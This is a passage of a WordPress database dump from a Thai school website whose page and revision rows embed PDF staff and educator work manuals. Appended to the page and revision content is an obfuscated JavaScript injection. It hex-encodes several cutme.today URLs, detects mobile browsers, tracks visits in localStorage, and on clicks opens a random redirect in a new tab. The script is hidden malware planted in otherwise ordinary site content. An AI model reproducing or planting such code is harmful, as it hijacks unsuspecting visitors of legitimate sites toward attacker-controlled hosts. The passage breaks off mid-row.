(784,1,'2024-08-09 11:58:23','2024-08-09 04:58:23','<!-- wp:file {\"id\":815,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\",\"displayPreview\":true,\"previewHeight\":1200} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:1200px\" aria-label=\"คู่มือการปฏิบัติงานของเจ้าหน้าที่\"></object><a id=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\">คู่มือการปฏิบัติงานของเจ้าหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการปฏิบัติงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-27bb8d24-9bca-4395-9358-a87d517f52df\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1713,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\",\"displayPreview\":true,\"previewHeight\":1200} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\" type=\"application/pdf\" style=\"width:100%;height:1200px\" aria-label=\"คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568\"></object><a id=\"wp-block-file--media-264eafb8-7081-4295-bcbb-7b65e3fd3fc2\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\">คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-264eafb8-7081-4295-bcbb-7b65e3fd3fc2\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่','','publish','closed','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%ab%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95','','','2025-07-05 14:52:24','2025-07-05 07:52:24','',0,'http://pakhaeng.ssk.in.th/?page_id=784',0,'page','',0),
(785,1,'2024-08-09 11:58:05','2024-08-09 04:58:05','','010คู่มือปฏิบัติงานบุคลกรทางการศึกษา','','inherit','','closed','','010%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%81','','','2024-08-09 11:58:05','2024-08-09 04:58:05','',784,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/010คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf',0,'attachment','application/pdf',0),
(786,1,'2024-08-09 11:58:23','2024-08-09 04:58:23','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:file {\"id\":785,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/010คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/010คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"010คู่มือปฏิบัติงานบุคลกรทางการศึกษา\"></object><a id=\"wp-block-file--media-8d6cec4a-7f4d-4d5b-9005-db09908504c3\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/010คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\">010คู่มือปฏิบัติงานบุคลกรทางการศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/010คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-8d6cec4a-7f4d-4d5b-9005-db09908504c3\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่','','inherit','closed','closed','','784-revision-v1','','','2024-08-09 11:58:23','2024-08-09 04:58:23','',784,'http://pakhaeng.ssk.in.th/?p=786',0,'revision','',0),
(787,1,'2024-08-09 11:58:55','2024-08-09 04:58:55','','คู่มือปฏิบัติงานบุคลกรทางการศึกษา','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%81%e0%b8%a3','','','2024-08-09 11:58:55','2024-08-09 04:58:55','',784,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf',0,'attachment','application/pdf',0),
(788,1,'2024-08-09 11:59:07','2024-08-09 04:59:07','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:file {\"id\":787,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือปฏิบัติงานบุคลกรทางการศึกษา\"></object><a id=\"wp-block-file--media-8d6cec4a-7f4d-4d5b-9005-db09908504c3\" 